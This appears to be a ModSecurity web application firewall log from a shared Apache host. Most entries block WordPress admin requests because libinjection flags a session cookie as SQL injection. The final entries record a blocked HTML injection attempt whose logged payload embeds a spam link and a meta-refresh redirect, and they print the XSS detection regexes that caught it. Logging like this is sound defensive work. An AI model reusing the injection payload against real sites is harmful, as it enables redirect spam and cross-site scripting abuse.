[Mon May 11 22:31:49.977922 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8taFW67LJTsgN3jQNxgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:50.072684 2026] [autoindex:error] [pid 1606352:tid 1606442] [client 18.200.148.154:53810] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:31:51.239678 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8t6FW67LJTsgN3jQNyAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:51.239965 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8t6FW67LJTsgN3jQNyAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:51.846057 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8t6FW67LJTsgN3jQNyAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:52.743103 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8uKFW67LJTsgN3jQNygAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:52.743423 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8uKFW67LJTsgN3jQNygAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:53.901477 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8uKFW67LJTsgN3jQNygAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:54.333836 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8uqFW67LJTsgN3jQNywAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:54.334131 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8uqFW67LJTsgN3jQNywAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:54.886448 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8uqFW67LJTsgN3jQNywAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:55.632816 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8u6FW67LJTsgN3jQNzgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:55.633114 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8u6FW67LJTsgN3jQNzgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:55.957996 2026] [security2:error] [pid 1590352:tid 1590416] [client 119.28.100.145:60210] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/formation.html"] [unique_id "agI8u61q0G_aXAqWauT8wwAAAJg"]
[Mon May 11 22:31:56.193282 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8u6FW67LJTsgN3jQNzgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:56.364892 2026] [:error] [pid 1606352:tid 1606428] [client 18.200.148.154:48372] File does not exist: /home/totalcloud/public_html/index.php, referer: http://totalcloud.fr/robots.txt
[Mon May 11 22:31:56.859353 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8vKFW67LJTsgN3jQN1wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:56.859638 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8vKFW67LJTsgN3jQN1wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:57.215905 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8vKFW67LJTsgN3jQN1wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:57.634141 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8vaFW67LJTsgN3jQN2QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:57.634431 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8vaFW67LJTsgN3jQN2QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:58.253877 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8vaFW67LJTsgN3jQN2QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:58.637436 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8vqFW67LJTsgN3jQN2gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:58.637730 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8vqFW67LJTsgN3jQN2gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:59.230378 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8vqFW67LJTsgN3jQN2gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:59.850406 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8v6FW67LJTsgN3jQN2wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:59.850795 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8v6FW67LJTsgN3jQN2wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:00.086104 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>high-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.091005 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>H..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.091203 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.091325 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OW [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.091525 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.091960 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
